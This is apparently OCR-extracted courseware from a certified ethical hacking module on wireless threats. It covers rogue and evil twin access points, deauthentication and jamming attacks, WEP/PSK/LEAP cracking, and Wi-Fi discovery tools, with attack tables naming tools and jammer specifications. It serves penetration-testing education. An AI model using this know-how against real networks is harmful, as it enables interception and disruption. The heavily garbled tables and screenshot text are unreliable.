observation of external traffic characteristics.
C ra ck in g W E P Key
Capturing data to recover a W EP key using brute force or Fluhrer-MantinShamir (FMS) cryptanalysis. Masquerading as an authorized AP by
Aircrack, AirSnort, chopchop, dwepcrack, WepAttack, WepDecrypt, WepLab cqureAP, HermesAP, HostAP, OpenAP, Quetec, WifiBSD
E v il T w in A P
beaconing the WLAN's service set identifier (SSID) to lure users.
Module 15 Page 2204
Running traditional man-in-theMan-in-theM id d le A tta c k middle attack tools on an evil twin AP to intercept TCP sessions or SSL/SSH tunnels. Pretends to be an authorized user of a M a sq u e ra d in g system in order to gain access to it.
dsniff, Ettercap
Stealing passwords,
login
IDs
and
bypassing
authentication mechanisms Manipulating the network so the Sessio n H ija c k in g attacker's host appears to be the desired destination. Setting its service identifier (SSID) to H o n e y p o t Access P o in t be the same as an access point at the local hotspot assumes the attacker as the legitimate hotspot. TABLE 15.7: Various types of confidentiality attacks with description and tools Manipulating SSID Manipulating
Module 15 Page 2205
W ireless Threats: A vailability Attacks
CEH
Denial of Service attacks aim to prevent legitimate users from accessing resources in a wireless network A v a ila b ility A ttacks
Access Point Theft
Denial of Service
Authenticate Flood ARP Cache Poisoning Attack Power Saving Attacks
Disassociation Attacks
De-authenticate Flood
EAP-Failure
Routing Attacks
II
TKIP M MIC Exploit
W ir e le s s T h re a ts : A v a ila b ilit y A tta c k s These attacks aim at obstructing the delivery of wireless services to legitimate users,
either by crippling those resources or by denying them access to WLAN resources. There are many attacks using which an attacker can obstruct the availability of wireless networks. The availability attacks include:
Type of Attack Access Point Theft
Description Physically removing an AP from a public space. Exploiting the CSMA/CA Clear Channel Assessment (CCA) mechanism to make a channel appear busy. Generating thousands of counterfeit 802.11 beacons to make it hard for stations to find a legitimate AP. Sending forged Authenticates or
Method and Tools Five finger discount
Denial of Service
An adapter that supports CW Tx mode, with a low-level utility to invoke continuous transmit
Beacon Flood
FakeAP
Authenticate Flood
Airjack, File2air, Macfld, vo id ll
Module 15 Page 2206
Associates from random MACs to fill a target AP's association table. Disassociation Attacks Causes the target unavailable to other wireless devices by destroying the connectivity between station and the client. Flooding station(s) with forged Deauthenticates or Disassociates to disconnecting users from an AP. Generating invalid TKIP data to exceed the target AP's MIC error threshold, suspending WLAN service. Provides attackers with many attack vectors. Observing a valid 802.IX EAP exchange, and then sending the station a forged EAP-Failure message. Routing information is distributed within the network. Transmitting a spoofed TIM or DTIM to the client while in power saving mode causes the DoS attack.
TABLE 15.8: Various types of availability attacks
Destroys the connectivity
Deauthenticate Flood
Airjack, Omerta, voidll
TKIP MIC Exploit
File2air, wnet dinject
ARP Cache Poisoning Attack EAP-Failure
QACafe, File2air, libradiate
Routing Attacks Power Saving Attacks
RIP protocol
Module 15 Page 2207
W ireless Threats: Authentication Attacks
CEH
I The objective of authentication attacks is to steal the identity of Wi-Fi clients, their personal information, login credentials, etc. to gain unauthorized access to network resources
PSK Cracking
Identity Theft
LEAP Cracking
Shared Key Guessing
VPN Login Cracking
Password Speculation
Domain Login Cracking
Application Login Theft
Copyright b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
Wireless Threats: Authentication Attacks

The objective of authentication attacks is to steal the identity of Wi-Fi clients, their personal information, login credentials, etc. to gain unauthorized access to network resources.
Type of Attack Application Login Theft
Description Capturing user credentials (e.g., email address and password) from cleartext application protocols. Recovering a WPA PSK from captured key handshake frames using a dictionary attack tool. Attempting 802.11 Shared Key Authentication with guessed vendor default or cracked WEP keys. Recovering user credentials (e.g., Windows login and password) by cracking NetBIOS password hashes, using a brute-force or dictionary attack tool.
Method and Tools Ace Password Sniffer, Dsniff, PHoss, WinSniffer coWPAtty, KisMAC, wpa_crack, wpa-pskbf WEP cracking tools
PSK Cracking
Shared Key Guessing
Domain Login Cracking
John the Ripper, LOphtCrack, Cain
Module 15 Page 2208
Identity Theft VPN Login Cracking
Capturing user identities from cleartext 802.IX Identity Response packets. Recovering user credentials (e.g., PPTP password or IPSec Preshared Secret Key) by running brute-force attacks on VPN authentication protocols. Using a captured identity, repeatedly attempting 802.IX authentication to guess the user's password. Recovering user credentials from captured 802.IX Lightweight EAP (LEAP) packets using a dictionary attack tool to crack the NT password hash.
TABLE 15.9: Various types of authentication attacks
Capture tools ike_scan and ike_crack (IPsec), anger and THC-pptpbruter (PPTP) Password dictionary
Password Speculation
LEAP Cracking
Anwrap, Asleap, THCLEAPcracker
Module 15 Page 2209
R o g u e
A c c e s s
P o in t A t t a c k
C E H
User Connecting
t cgit Com pany W i-Fi N etw o rk SSID: juggyboy Wi-Fi Channel: 6
Rogue wireless access point placed into an 802.11 network can be used to hijack the connections of legitimate network users
When the user turns on the computer, the rogue wireless access point will offer to connect with the network user's NIC
All the traffic the user enters will pass through the rogue access point, thus enabling a form of wireless packet sniffing
Copyright b y
EG-G*nncil. All
Rights Reserved. Reproduction is Strictly Prohibited.
Rogue Access Point Attack
= H K 802.11 allows wireless access points to connect to the NICs by authenticating with the help of service set identifiers (SSIDs). Unauthorized access points can allow anyone with an 802.11-equipped device onto the corporate network, which puts a potential attacker close to the mission-critical resources. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations. The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. The attacker can then create his or her own rogue access point and place it near the target corporate network. Rogue wireless access point placed into an 802.11 network can be used to hijack the connections of legitimate network users. When the user turns on the computer, the rogue wireless access point will offer to connect with the network user's NIC. The attacker lures the user to connect to the rogue access point by sending his/her SSID. If the user connects to the rogue access point considering it as a legitimate AP, all the traffic the user enters will pass through the rogue access point, thus enabling a form of wireless packet sniffing. The sniffed packets may even contain username and passwords.
Module 15 Page 2210
Ethical Hacking and Countermeasures Copyright by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
:it C o m p any Wi-Fi N e tw o rk

User Connecting to Rogue Access Point
SSID: juggyboy Wi-Fi Channel: 6
My is
ju g g y b o y
connect to me A tt.u k.r
FIGURE 15.15: Attacker performing Rogue Access Point Attack
Module 15 Page 2211
C lie n t M is - a s s o c ia t io n
Control Room
CEH
Storage
Client Mis-association Air Traffic Controller SSID: juggyboy
Attacker sets up a rogue access point outside the corporate perim eter and lures the em ployees of the organization to connect with it
O n c e a ss o c ia ted , e m p lo y e e s m ay b y p a ss th e e n te rp ris e s e c u rity policies
Copyright b y EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
C lient Mis-association
An attacker set up a rogue access point outside the corporate perimeter and lures the employees of the organization to connect with it. This can be potentially used as a channel by the attacker to bypass enterprise security policies. Once a Wi-Fi client connects to the rogue access point, an attacker can steal the sensitive information such as user names and passwords by launching man-in-the-middle kind of attacks.
Module 15 Page 2212
Control Room
M a in te n a n ce
Storage
Client Mis-association
A ir Traffic C o ntroller S S ID : juggyboy
Attacker in the Neighboring Network
FIGURE 15.16: Client Mis-association
Module 15 Page 2213
M isconfigured A ccess Point Attack
U rtllM
c EH
itkKJl
M isconfigured Access Point Attack

Most organizations spend significant amounts of time defining and implementing WiFi security policies, but it may possible that the client of the wireless network may change the security setting on AP unintentionally; this in turn may lead to misconfigurations in access points. A misconfigured AP can expose a well-secured network to attacks. Attackers can easily connect to the secured network through misconfigured access points. The following are the elements that play an important role in this kind of attack: 9 9 SSID Broadcast: Access points are configured to broadcast SSIDs to authorized users Weak Password: To verify authorized users, network administrators incorrectly use the SSIDs as passwords Configuration Error: SSID broadcasting is a configuration error that assists intruders in stealing an SSID and has the AP assume they are allowed to connect
Module 15 Page 2214
FIGURE 15.17: Attacker performing Misconfigured Access Point Attack
Module 15 Page 2215
U n a u t h o r iz e d
A s s o c ia t io n
enabling Trojan
C E H
Urti*W itkHil lUckw
A c c o u n t in g
Department
Stock Holding 2 Production House
Soft access points are client cards or embedded WLAN radios in some PDAs and laptops that can be launched inadvertently or through a virus program
Attackers infect victinVs machine and activate soft APs allowing them 1 unauthorized connection to the enterprise network
Attacker connect to enterprise network through soft APs instead of the actual Access Points
Attacker
Copyright b y
EG-C*ancil. All
Rights Reserved. Reproduction Is Strictly Prohibited.
Unauthorized Association
Unauthorized association is a major threat to the wireless network. This may be one of two kinds: accidental association or malicious association. Malicious association is accomplished with the help of soft APs. Attackers use soft APs to gain access to the target wireless network. Software access points are client cards or embedded WLAN radios in some PDAs and laptops that can be launched inadvertently or through a virus program. Attackers infect the victim's machine and activate soft Aps, allowing them unauthorized connection to the enterprise network. Attackers connect to an enterprise network through soft APs instead of the actual access points.
Module 15 Page 2216
FIGURE 15.18: Unauthorized association threat in wireless networks
Module 15 Page 2217
A d
H o c
C o n n e c t io n
A t t a c k
Hotel Wi-Fi N etw o rk
Lounge
o
W i- Fi clients com m unicate directly via an ad hoc m ode that do not require an A P to relay packets
e
Ad hoc m ode is inherently insecure and does not provide strong au thentication and encryption
0
Thus attackers can easily connect to and com prom ise the enterprise client operating in ad hoc mode
Attacker
/Copyright b y EC - C M IC il. All Rights R e s e n / e i Reproduction is Strictly Probfbited.
Ad Hoc Connection Attack

b - 1 Wi-Fi clients communicate directly via an ad hoc mode that does not require an AP to relay packets. The networks that are connected in ad hoc mode share information across the clients conveniently. To share audio/video content with others, most Wi-Fi users use ad hoc networks. Sometimes the networks are forced to enable ad hoc mode by the resources that can be accessed only in ad hoc mode, but this mode is inherently insecure and does not provide strong authentication and encryption. Thus, attackers can easily connect to and compromise the enterprise client operating in ad hoc mode.
Module 15 Page 2218
Hotel Wi-Fi Network
Lounge
Attacker
FIGURE 15.19: Attacker compromising the enterprise client using Ad Hoc Connection Attack
Module 15 Page 2219
H oneySpot A c c e ss P oint Attack
CEH
Attacker
Attacker traps victims by using fake hotspots
Copyright b y
EG-G(nncil. All
HoneySpot Access Point Attack

r>
, . . Users can connect to any available network in case of multiple WLANs co-existing in the same space. This kind of multiple WLAN is more exploitable by attacks. The attackers can set up an unauthorized wireless network by operating an access point in the region of multiple WLANs and can allow the users of the authorized networks to get connected to it. These APs mounted by the attacker are called "honeypot" APs. These APs transmit a stronger beacon signal. Usually wireless network cards look for strong signals for access. Hence, an authorized user may connect to this malicious honeypot AP; this creates a security vulnerability and sends the sensitive information of the user such as identity, user name, and password to the attacker.
Module 15 Page 2220
Attacker
Attacker traps victims by using fake hotspots
FIGURE 15.20: HoneySpot Access Point Attack process
Module 15 Page 2221
A P
M A C
S p o o fin g
8 Hacker spoofs the MAC address of WLAN client equipment to mask as an authorized client 6 Attacker connects to AP as an authorized client and eavesdrop on sensitive information
Device with MAC address: 00-0C-F1-56-98-AD Production Department

O n ly c o m p u te r fr o m p ro d u ctio n
Accounting Department
Reception it n /ft
d e p a r t m e n t can c o n n e c t to m e
Attacker
Hacker spoofing the MAC address

C o pyrigh t b y
EG-Gouncil. All
Rights KeServect;R ep rod u ctio n is Strictly Prohibited.
AP M A C Spoofing
In wireless LAN networks, the access points transmit probe responses (beacons) to advertise their presence in the air. The probe responses contain the information about their identity (MAC address) and identity of the network it supports (SSID). The clients in the vicinity connect to the network through these beacons based on the MAC address and the SSID that it contains. Many software tools and most of the APs allow setting user-defined values for the MAC addresses and SSIDs of AP devices. Attackers spoof the MAC address of the AP by programming the AP to advertise exactly the same identity information as that of the victim AP. Attackers spoof the MAC address of the wireless LAN client equipment to masquerade as an authorized client and to connect to the AP. As the attacker connected to the AP as the authorized client, he or she can have full access to the network as that of a legitimate client and the attacker can use the connection for his or her own malicious purposes and can eavesdrop on sensitive information.
Module 15 Page 2222
FIGURE 15.21: AP MAC Spoofing
Module 15 Page 2223
Ethical Hacking and Countermeasures Copyright by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
D e n ia l-o f-S e r v ic e A tta c k

Data Warehouse
CEH
W ireless DoS attacks disrupt n e tw o rk w ireless connections by sending broadcast "deau thenticate" comm ands
Transmitted deauthentication forces the clients to disconnect from the AP
D en ia lofService Attack
Wireless networks are susceptible to denial-of-service (DoS) attacks. Usually these networks operate in unlicensed bands and the transmission of data takes in the form of radio signals. The designers of the MAC protocol aimed at keeping it simple, but it has its own set of flaws that are more attractive to DoS attacks. WLANs usually carry mission-critical applications such as VoIP, database access, project data files, and internet access. Disrupting such missioncritical applications on WLANs by DoS attack is easy. This usually causes loss of productivity or network downtime. Examples of MAC DoS attacks are: de-authentication flood attack, virtual jamming, and association flood attacks. Wireless DoS attacks disrupt network wireless connections by sending broadcast "deauthenticate' commands. Broadcast deauthentication forces the clients to disconnect from the AP.
Module 15 Page 2224
User-2
Data Warehouse
5 ^ ^ ? f/ / . lV I . f j
: nected Administrative Decision
A S 0 'V **
6fV>
%
Attacker
FIGURE 15.22: Illustrating Denial-of-Service Attack on wireless networks
Module 15 Page 2225
J a m m in g S ig n a l A tta c k
An attacker stakes out the area from a nearby location with a high gain amplifier drowning out the legitimate access point
All wireless networks are prone to jamming, This jamming signal causes a DoS because 802.11 is a CSMA/CA protocol, whose collision avoidance algorithms require a period of silence before a radio is allowed to transmit
Users simply can't get through to log in or they are knocked off their connections by the overpowering nearby signal
Attacker
Jamming Device
Copyright b y
EG-G(nncil. All
Ja m m in g Signal A ttack
Spectrum jamming attacks usually block all communications completely. This kind of attack can be performed with the help of a specialized hardware. An attacker stakes out the area from a nearby location with a high gain amplifier drowning out the legitimate access point. Users simply can't get through to log in or they are knocked off their connections by the overpowering nearby signal. All wireless networks are prone to jamming. The signals generated by jamming devices appear to be an 802.11 transmission to the devices on the wireless network, which causes them to hold their transmissions until the signal has subsided resulting in denial-of-service. These jamming signal attacks are relatively easily noticeable.
Module 15 Page 2226
Attacker
sending 2.4 GHz jam m ing signals
A tta ck er
Jam m in g D evice
FIGURE 15.23: Jamming Signal Attack
Module 15 Page 2227
W i- F i J a m m i n g D e v i c e s
MGT- P6 G PS Ja m m e r MGT- M P200 Ja m m e r
C EH
MGT- 03 Ja m m e r
llli
R a n g e: 1 0 2 0 ' meters 4 antennas 3G: 2110 ~2170MHz
Range: 50 - 75m Barrage + DDS sweep jamming 20 to 2500 MHz. Omni-directional
R a n g e: 0 40 meters 4 antennas
Wi-Fi / Bluetooth: 2400 2485 MHz
MGT- P6 Wi-Fi Ja m m e r
MGT- P 3 x l3 Ja m m e r
MGT- 04 W iF i Ja m m e r
Range: 10 ~ 20 meters iDen -CDMA -GSM: 850 ~ 960MHz DCS PCS: 1805 1990MHz 3G: 2110 ~ 2170MHz Wi-Fi / Bluetooth: 2400 ~ 2485MHz 4 antennas
R a n g e: 50 ~ 200 meters 3 frequency bands jammed
Range: 0 80 meters 4 Frequency bands jammed: GSM: 925 *960 Mhz DCS: 1805 ~ 1880 Mhz 3 G: 2110 ~ 2170 Mhz -WiFi / Bluetooth: 2400 2485 MHz 4 antennas
http://www.magnumtelecom.com
W i-Fi Ja m m in g D evices
Wi-Fi jamming is a kind of attack on wireless networks. This can be done by using some hardware devices. The devices used by the attacker for Wi-Fi jamming use the same frequency band as that of a trusted network on which the attacker want to launch the attack. The Wi-Fi jamming devices generate the signals with the same frequency as that of the trusted wireless network signals. This causes interference to the legitimate signal and temporarily disrupts the network service. The following are a few Wi-Fi jamming devices:
Module 15 Page 2228
MGT- P6 GPS Jammer
MGT- MP200 Jammer
MGT- 03 Jammer
Range : 10 ~ 20 meters 4 antennas 3G: 2110 2170MHz Wi-Fi/ Bluetooth: 2400~ 2485MHz
Range: 50-75m Barrage + DDS sweep jamming 20 to 2500 MH2 . Omni-directional antennas
Range : 0 ~ 40
m e te rs
%
MGT- 04 WiFi Jammer
Range: 0 ~ 80 meters 4 Frequency bands
MGT- P6 Wi-Fi Jammer

Range: 10 ~ 20 meters iDen - CDMA - GSM: 850" 960MHz DCS PCS: 180 5' 1990MHz 3G: 2110 ~ 2170MHz W i Fi / Bluetooth: 24003485MHZ 4 antennas
MGT- P3xl3 Jammer
HH
Range : 50~ 200 meters 3 frequency bands jammed
jammed: GSM: 925~ 960 Mh DCS: 1 8 0 S 1880 Mh? - 3 G : 2 1 1 0 2 1 7 0 Mhz
W iFi/Bluetooth: 2400* ?48SMH7 4 antennas
FIGURE 15.24: Various Wi-Fi jamming devices
Module 15 Page 2229
Module Flow
CE H
M odule Flow
Wireless networks are prone to many vulnerabilities. Even though proper security mechanisms are employed by an organization, it may still be vulnerable. This is because the security mechanisms themselves may contain flaws. Attackers can hack a wireless network by exploiting those vulnerabilities or flaws in security mechanisms. For full scope penetration testing, the pen tester must test the network by following a wireless hacking methodology.
Wireless Concepts
Wireless Encryption
Wireless Threats
^ y
v
Bluetooth Hacking
Countermeasure s
Wireless Security Tools
Module 15 Page 2230
Wi-Fi Pen Testing
Module 15 Page 2231
W ireless H acking M ethodology
CEH
W i-Fi D isc o ve ry
The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources
C o m p ro m ise the W i-Fi N e tw o rk
C ra c k W i-F i E n c ry p tio n
Lau n ch W ire le ss A tta c k s
Copyright b y
EG-G*nncil. All

J The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources. Attackers usually follow a hacking methodology to ensure that they don't miss even a single entry point to break into the target network. Discovering a Wi-Fi network or device is the first action that an attacker should perform. You can perform Wi-Fi discovery with the help of tools such as insider, NetSurveyor, insider, NetStumbler, Vistumbler, WirelessMon, etc.
Module 15 Page 2232
Footprint the W ireless Network
(citifwd
c EH
ItkKJl NMkw
Attacking a wireless network begins with discovering and footprinting the wireless network in an active or passive way
Passive Footprinting Method

An attacker can use the passive way to the existence of an A P detect
by sniffing the packets
from the airwaves, which will reveal the AP, SSID and attacker's wireless devices that are live
A tta c k e r sn iffs W i- F i t ra ffic
A ctive Footprinting Method

A tta ck er sends a p ro be request A P sends probe
In this method, attacker's
wireless device sends to see if an AP does not have
^ .........
re s p p n s e m
out a probe request with the SSID responds. If the wireless device request with an empty SSID
the SSID in the beginning, it will send the probe
J
Copyright by E C - C M C i . All Rights Reserved. Reproduction is Strictly Prohibited.
Footprint the Wireless Network

Attacking a wireless network begins with the discovery and footprinting of a wireless network. Footprinting involves locating and analyzing (or understanding) the network. Footprinting of a wireless network can be done in two methods. In order to perform footprinting of a wireless network the first requirement is identifying the BSS that is provided by the access point (AP). BSS or IBSS can be identified with the help of SSID. The attacker can use this SSID to establish an association with the AP. Footprinting Methods:
c M W
P a s s iv e m e th o d
An attacker can use the passive way to detect the existence of an AP by sniffing the packets from the airwaves, which can reveal the AP, SSID, and attacker's wireless devices that are live.
) A c tiv e M e th o d
In this method, the attacker's wireless device sends out a probe request with the SSID to see if an AP responds. If the wireless device does not have the SSID in the beginning, it can send the probe request with an empty SSID. In case of probe request with an empty SSID, most of the APs respond to it with their own SSID in a probe response packet.
Module 15 Page 2233
Consequently, the empty SSIDs are useful in knowing the SSIDs of APs. Here the attacker knows the correct BSS with which to associate. An AP can be configured to ignore a probe request with an empty SSID.
Module 15 Page 2234
Attackers Scanning for Wi-Fi Networks
CEH -
Copyright b y
EG-C*ancil. All
Attackers Scanning for W i-F i Networks

Attackers can scan for Wi-Fi networks with the help of wireless network scanning tools such as NetSurveyor, Retina Wi-Fi scanner, etc. The service set identifier (SSID) can be found in beacon, probe requests and responses, and association and reassociation requests. An attacker can gain obtain the SSID of a network by passive scanning. If the attacker fails to obtain SSID by passive scanning, then he or she can determine it by active scanning. Once the attacker succeeds in determining the SSID, he or she can connect to the wireless network and launch various attacks. Wireless network scanning allows sniffing by tuning to various radio channels of the devices.
Module 15 Page 2235
FIGURE 15.25: Scanning of Wi-Fi networks by attackers
Module 15 Page 2236
F in d
W i- F i N e tw o r k s
to A t t a c k
1. The first task an attacker will go through when searching for Wi-Fi targets is checking th e potential netw ork s that are in range to
S te p s
find the best one to attack 2. Drive around w ith Wi-Fi enabled laptop installed w ith a wireless discovery tool and map out active wireless networks
/
L a p to p w ith W i-Fi C ard
You w ill n e e d th e s e to d is c o v e r W i-Fi n e tw o rk s E x te rn a l W iFi A n te n n a
I
N e tw o rk D is c o v e ry P ro g ra m s
--------
Tools Used: inSSIDer, NetSurveyor, NetStumbler, Vistumbler etc.
Copyright b y
EG-G*ancil. All
Find W i-F i Networks to Attack

The first task an attacker can go through when searching for Wi-Fi targets is checking the potential networks that are in range to find the best one to attack. Wi-Fi networks can be found by driving around with a Wi-Fi enabled laptop. The laptop must have a wireless discovery tool installed on it. Using the discovery tool, the attacker can map out the active wireless networks. To discover Wi-Fi networks, the attacker needs: 9 9 9 Laptop with Wi-Fi card External Wi-Fi antenna Network discovery programs
Several Wi-Fi network discovery tools are available online that give more information about the wireless networks in the vicinity. Examples of tools that can be used for finding Wi-Fi networks include inSSIDer, NetSurveyor, NetStumbler, Vistumbler, etc.
Module 15 Page 2237
W i-Fi D isco v e r y Tool: inSSIDer

File View
*
Help
1 1 -1 4 - | | Network Type w 1
Stop GPS
EnGen1u5 8Q2.Ha/b/g/n Wireless USB Adopter F
Step
FILTER
m eta g ee k
M ACAddress 00:1E:58 00:19:77 E0:91:F5 0G1D:7E M 00.1977 1 % * l %
I SSID MaGeek_QA_1 NttaGMkGN Key Deagn W eb! 8 5THCONFL MetaGeekGN RADIUS-TEST0 UCEEM-24GHZ Tiire Grach 2.4 GHr Charnela
1RSSI
Channel | Secufty 47 5*1 W?A2-Pfsonal WPA2-Pfsonal WPAFeracral WPA-Fenoral WPA2-Peracnd WPA2-Entetprisc WPA2-Pw m I
M ax Rate 3 0 0 1 3 0 5 4 5 4 IX 2 1 6 2 1 6
| Netwoik Type In frastructure Irtfrastfucture Infrastructure Hraottucture Irfrasttudure Infrastructure Irfrastfucture
Vendor D L m kCo poraton Aerohve I4ec*aks. he. NETGEAR Gsco LiT k3 y3 . LLC Aerofave Netwaks. he. CradlePont. Irj D-M EDIAC om rouncabo
------ 5 9 1 1 ;------ *5 6 ------ 6 56 1 ------ * 1 _ 7 91 1 1 ___ &GH2 Cbarrels 1 1 = - 1
00 3044 0011 E0 lirprcve YourVtf-Fi
1.
Inspect W LAN and surrounding networks to troubleshoot competing access points
2. Track the strength of received signal in dBm over tim e and filter access points in an easy-to-use form at 3. 4. Highlight access points for areas w ith high W i-Fi concentration Export W i-Fi and GPS data to a KM L file to view in Google Earth and Filter through hundreds of scanned access points
MatoGailcGN 2 0 -JLB 3 0 MataGeek_QA_1 - Key Dejipri \vet!tea 4 0 AHAGuoot y<|w ost41J5 5 0 -m 5THCONFL 6 0 IJCFFM-? 4GH7 70 -Gallatin Guest -RADUS-TEST0 80 -MctoGodtGN 9 0 GALLATIN 1 0 0
21/29 AP(s)
Waiting
Logging: Off
Copyright b y
EG-G*ancil. All
W i-Fi Discovery Tool: inSSIDer

H i Source: http://www.metageek.net InSSIDer is open source Wi-Fi scanner software. It works with Windows Vista/7 and 64-bit PCs. It uses the Native Wi-Fi API and the current wireless network card, sorts the results by MAC address, SSID, channel, RSSI, and "Time Last Screen." SSID dos:
9 9 9 9
Inspect WLAN and surrounding networks to troubleshoot competing access points Track the strength of the received signal in dBm over time Filter access points in an easy-to-use format Highlight access points for areas with high Wi-Fi concentration
9 Export Wi-Fi and GPS data to a KML file to view in Google Earth
9
Filter through hundreds of scanned access points
Module 15 Page 2238
FIGURE 15.26: inSSIDer Screenshot
Module 15 Page 2239
Wi-Fi Discovery Tool: Net$urvfeyor I C E H

J NetSurveyor is a network discovery tool used to gather information about nearby wireless access points in real time
http://www.perform ancewifi.net
-Cbpyright b y EC - C M IC il. All RightsResen/ed^Reproduction Is Strictly Probfbited.
jt
j*
W i-Fi Discovery Tool: NetSurveyor

Source: http://www.performancewifi.net
NetSurveyor is an 802.11 (WiFi) network discovery tool that gathers information about nearby wireless access points in real time and displays it in useful ways. The data is displayed using a variety of different diagnostic views and charts. Data can be recorded for extended periods and played-back at a later date/time. Also, reports can be generated in Adobe PDF format.
Module 15 Page 2240
Module 15 Page 2241
W i-F i D isco very Tool: N etS tu m b ler

Facilitates detection of Wireless LANs using the 802.11b, 802.11a and 802.11g WLAN standards
EH
1 X 5 .1 3 3 H BM E3 E
1. 2.
W a r d r iv in g V e r if y in g n e t w o r k c o n f ig u r a t io n s
3.
F in d in g lo c a t io n s w i t h p o o r c o v e r a g e in o n e 's W L A N
4.
D e te c t in g c a u s e s o f w ir e le s s in te rfe re n c e
5.
D e te c t in g r o g u e a c c e s s p o in ts
IH li
6.
A im in g d ir e c t io n a l a n te n n a s f o r lo n g - h a u l W L A N lin k s
iq'iftf* IHIIIM]
110%/t7m 0*w11 ...
1 !1 I III M i
http://www.netstumbler.com
Copyright b y K - C w n c il. All Rights Reserved. Reproduction is Strictly Prohibited.
W i-Fi Discovery Tool: NetStumbler

Source: http://www.netstumbler.com NetStumbler is a tool that sniffs Wi-Fi signals and informs users if their wireless network is properly configured. But prior to downloading, users need to check if their wireless cards are compatible with NetStumbler. The next step is to disable the automatic configuration service of the said device. Users of Windows machines, for example, must turn off the Windows Wireless Zero Configuration service, which can be located in the Control Panel/Administrative Tools/Services. NetStumber features several columns that provide useful information on detected signals. The media access control column or MAC reflects signal strengths as indicated by the color of the dots that represent each entry. A padlock symbol inside the dot suggests that the access point is encrypted. The SSID or service set identifier column locates the network from which the wireless packets come from. The Chan (channel) heading shows which channel the network access point is tapping for signal broadcasting and beside that is the column for channel speed, which is expressed in Mbps. The vendor heading reveals the name of device manufacturers like Linksys, Netgear, D-link, and 2Wire while the Signal-to-Noise Ratio column indicates the quality of Wi-Fi signal. Commonly used for:
Module 15 Page 2242
Wardriving Verifying network configurations Finding locations with poor coverage in one's WLAN Detecting causes of wireless interference Detecting unauthorized ("rogue") access points Aiming directional antennas for long-haul WLAN links
Ete Ed* Y* w Cpacre wrto*
9
9 9 9 9
H
CK 1 3 11 3 .5 6 II 1 6 3 5 1 7 1 1 1 1 WEP Tr t* AP AP AP AP Y ai AP AP AP Y ai AP AP AP AP Y ai AP Y ai AP AP AP AP 5510 A rW O H A rW o w A rW 0*f A rW < m Alan2 Alpha alpha a d lo n A n fa la 't A rp o rt A rana A n ja la 't A rp o rt A rana
any ANY H am
2> q < &1 > s i * * 1f

a '4 ' OionMti
T> HJC
i'f 4
I 'f t f t 7
'( > gt 000220008551 # 0040962*702* 00409632*06( 00409635B3F? 0040963902s;,.
.1
# O O 0 2 2 t> 0 F 9 t2 1 #006010*02*88 OO022D0FCCC8 # 00601 C f0 5 5C #0040964429 A # 0 0 6 0 1 0 1 El AFC # 0 0 4 0 9 6 3 0E 8 0 8 # 0040964928E5 0 06 01 0 22 C 09 4 # 0 06 01 DF1CC7P #009048084891 # 0 030A 80650A 6 # 0 0 0 2 2 t> 0 c 3 3 0 c # 00022D 08A 6A 9 # 0 0 0 2 2 D IF 5 C * 7 # 0 0 0 2 2 b lF 6 5 3 8
M
H oppy Oonwts A rW *aO na AP2 P r n ta r '1 Inc M ov ta aw API P rvrtar! Inc M oontaew iew
A n g lo 'S Antmol Town H ffO thl'f Hor*}C*er Haavn
A partan t App la N etw ork 080609 Appla N etw ork If5 d b 7 Apple N etw ork 116538
V endor SN P Aq4re (lo c a n t) O rinoco A q tr t (lo c a n t) W avelA N A g tri (lo c a n t) O rinoco A<j*r* (Locant) W avel AN C ijco (A ironat) A 9a ra (lo c a n t) W a v a l AN C itco (A ironat) C isco (A ironat) * 9ra (lo c a n t) W <m lA N A je re (lo c a n t) W avalA N G am tak (t> L 1nk) O alta N etw ork! Aq*r4 (lo c a n t) O rinoco A 9a ra (lo c a n t) O rinoco A$4r4 (lo c a n t) O rinoco A aere (lo c a n t) O rinoco
| ^JR 20 10 27 46 10 9 32 8 31 48 13 11 2 13 5 I
| latitude
| 10 lJ
N 37413520 Wl N 3 7 3 32 25 3 Wl N 37 .4 12 74 8 W l N 37 4 4 2 6 4 3 N 37 4 4 3 0 7 3 N 37 410712 N 3 7 3 3 3 67 8 Wl Wl Wl Wl
r1
0 0 0 2 2 0 0 fC E C l J
00 0 0 2 2 0 0 f 0 l0 <
0 00 22 01 B 76 5f 0 0 0 22 01 F 65 06 , 0 06 01 01E3741 0 0 6 0 ! w 0 je 8 0 06010F 0565C 00601 O f 2 4 7 4 !
1 A *tan2
S 4 alpha $ 4k. aaKtwlon a A A nâla's A irpo rt A 3 A . ANY * 4 k A part*an t i 4 4ppl< N atw ork 00 Appla N etw ork lf * ^ , J__ :___ I if
in iW m
06/07/01 06/07/0106/07/0106/07/01 06/07/01 06/07/0106/07/0106/07/0106/07/0106/07/0106/07/01 09:24 3 3 0* 24:5009:25= 1 0 09:25 30 10:19:43 10200010:20:2010:20:4010:210010:21:5010:22:10
FIGURE 15.28: NetStumbler Screenshot
Module 15 Page 2243
Wi-Fi D iscovery Tool: Vistumbler
CEH
1. Finds wireless access points 2. Uses the Vista command ,netsh wlan show networks mode=bssid' to get wireless information 3. It supports for GPS and live Google Earth tracking
Copyright b y
EG-Gtlincil. All
W i-Fi Discovery Tool: Vistum bler

Source: http://www.vistumbler.net Vistumbler is a wireless network scanner. It keeps track of total access points w/gps, maps to kml, signal graphs, statistics, and more. Features: 9 9 Supports Windows Vista and Windows 7 Find Wireless access points - Uses the Vista command ,netsh wlan show networks mode=bssid' to get wireless information
Q 6
GPS support Export/import access points from Vistumbler TXT/VS1/VSZ or Netstumbler TXT/Text NS1 Export access point GPS locations to a google earth kml file or GPX (GPS exchange format) Live Google Earth Tracking: auto KML automatically shows access points in Google Earth Speaks Signal Strength using sound files, Windows sound API, or MIDI
9 9
Module 15 Page 2244
O VistumblervlO.il - By Andrew Calcutt - 2011/11/11 - (2011-11-21 23-57-00 mdb)

File Edit Options Use GPS
( Graphl 1[ Graph2
View
Settings
Interface
Extra
WifiDB
Help
*Support Vistumbler* Latitude: N Longitude: E
Active APs: / Actual bop time:
3 05 3 1 0 1 2 ms
